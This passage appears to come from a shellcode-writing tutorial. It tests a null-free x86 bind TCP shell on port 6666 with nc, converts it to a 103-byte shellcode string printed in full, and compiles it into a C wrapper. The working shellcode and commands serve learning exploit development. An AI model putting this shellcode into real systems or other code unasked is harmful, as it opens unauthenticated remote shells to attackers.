Let’s try to run the newly compiled assembly file and try to convert it to a C file
ASM
$ ./bind_tcp_initial_nonull &
[1] 2533
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
C
Converting to shellcode and compiling
$ cp ../sc_template_c.c bind_tcp_initial_nonull-c.c
$ ../convert_bin_sc.sh bind_tcp_initial_nonull
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x92\x56\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x52\x89\xe1\xcd\x80\x92\xb0\x3f\x87\xda\x89\xf1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xf1\x87\xd6\xcd\x80"
$ vim bind_tcp_initial_nonull-c.c
$ ../compile_c.sh bind_tcp_initial_nonull-c
[+] Compiling ...
[+] Done!
Running C compiled file
Running the file we see the shellcode is at 103 bytes large.
$ ./bind_tcp_initial_nonull-c &
[1] 2583
$ Shellcode Length: 103
$ nc localhost 6666
id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)